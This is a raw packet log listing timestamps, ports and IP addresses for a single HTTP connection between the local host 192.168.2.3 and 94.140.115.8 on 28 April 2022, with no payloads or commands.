Apr 28, 2022 10:35:55.301539898 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.301564932 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.301568031 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.301583052 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.301594973 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.301628113 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.347423077 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.347454071 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.347469091 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.347563982 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.347590923 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.347851992 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.347893000 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.347909927 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.347939968 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.347979069 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.387399912 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.387425900 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.387443066 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.387506008 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.387681961 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.387876987 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.387974977 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.425173998 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.425204039 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.425334930 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.425332069 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.425354958 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.425370932 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.425385952 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.425443888 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.425509930 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.426296949 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.426322937 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.426338911 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.426409960 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.426445007 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.426598072 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.426619053 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.426718950 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.426727057 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.426728010 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.427237034 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.499135017 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.499165058 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.499181032 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.499197006 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.499212980 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.499233007 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.499294043 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.499325991 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.501110077 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.501137972 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.501153946 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.501291037 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.501307964 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.501434088 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.501451015 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.501466036 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.501509905 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.508884907 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.508912086 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.508928061 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.509022951 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.514069080 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.515990019 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.559252024 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.559284925 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.559299946 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.559484959 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.559763908 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.559786081 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.559802055 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.559873104 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.559897900 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.560461044 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.560484886 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.560523033 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.560569048 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.560591936 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.566504955 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.566530943 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.566546917 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.566752911 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.590692997 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.591336966 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.610363007 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.610394001 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.610426903 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.610590935 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.610752106 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.610769987 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.610785961 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.610868931 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.610878944 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.610898972 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.610914946 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.610965014 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.610989094 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.617208958 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.617233992 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.617249012 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.617372990 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.659462929 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.662261963 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.662283897 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.662300110 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.662341118 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.662357092 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.662369967 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.662389994 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.662420034 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.662425041 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.662427902 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.662756920 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.662775993 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.662817955 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.662827015 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.662838936 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.662893057 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.663800955 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.663820982 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.663908958 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.663923025 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.665642023 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.670356035 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.670382977 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.670399904 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.670523882 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.670542002 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.708194017 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.708225965 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.708242893 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.708278894 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.708311081 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.708586931 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.708606005 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.708638906 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.708646059 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.708703041 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.709038019 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.709073067 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.709089041 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.709129095 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.709153891 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.709320068 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.709340096 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.709356070 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.709378958 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.709414959 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.722825050 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.722848892 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.722863913 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.722898960 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.722922087 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.723834038 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.723910093 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.755362988 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.755389929 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.755405903 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.755551100 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.755563021 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.755594969 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.755630970 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.755734921 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.755753994 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.755760908 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.756405115 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.756424904 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.756464005 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.756511927 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.756536007 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.756773949 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.756792068 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.756822109 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.756838083 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.756885052 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.771051884 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.771081924 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.771099091 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.771203995 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.771239042 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.787358999 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.787477016 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.801305056 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.801330090 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.801345110 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.801362991 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.801379919 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.801395893 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.801412106 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.801465988 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.802674055 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.802700996 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.802716017 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.802732944 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.802748919 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.802819967 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.802860975 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.836318016 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.899386883 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.238548040 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.238581896 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.238605022 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.238630056 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.238652945 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.238656044 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.238677979 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.238682032 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.238692999 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.238694906 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.238718033 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.238749027 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.238816023 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.238843918 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.238867044 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.238867998 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.238883972 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.238894939 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.238930941 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.300447941 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.300493956 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.300523043 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.300551891 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.300550938 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.300580025 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.300581932 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.300611973 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.300632954 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.300632954 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.300705910 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.300713062 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.317651033 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.317681074 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.317699909 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.317720890 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.317725897 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.317744017 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.317754984 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.317764044 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.317781925 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.317790985 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.317815065 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.317909002 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.363486052 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.363537073 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.363571882 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.363607883 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.363645077 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.363646984 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.363679886 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.363687992 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.363694906 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.363708019 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.363713980 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.363755941 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.363785982 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.363820076 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.363858938 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.363876104 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.363893032 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.363913059 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.363919020 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.363946915 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.363972902 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.431512117 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.431562901 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.431596994 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.431631088 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.431662083 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.431690931 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.431694984 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.431710005 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.431720018 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.431752920 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.431777000 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.431786060 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.431818962 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.431826115 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.431842089 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.431863070 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.431895018 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.431925058 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.431958914 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.431988955 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.432013988 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.432024002 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.432125092 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.498274088 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.498302937 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.498326063 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.498349905 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.498373032 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.498393059 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.498409033 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.498433113 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.498471975 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.498476982 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.498481035 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.498696089 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.498720884 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.498743057 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.498756886 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.498764992 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.498788118 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.498800993 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.498811007 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.498830080 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.498837948 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.498862028 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.498897076 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.572567940 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.572612047 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.572642088 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.572673082 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.572702885 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.572726965 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.572731972 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.572755098 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.572762012 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.572783947 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.572787046 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.572788954 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.572822094 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.572841883 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.572880983 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.572881937 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.572885990 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.572904110 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.572932959 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.572936058 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.572968960 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.572961092 CEST	49755	80	192.168.2.3	94.140.115.8
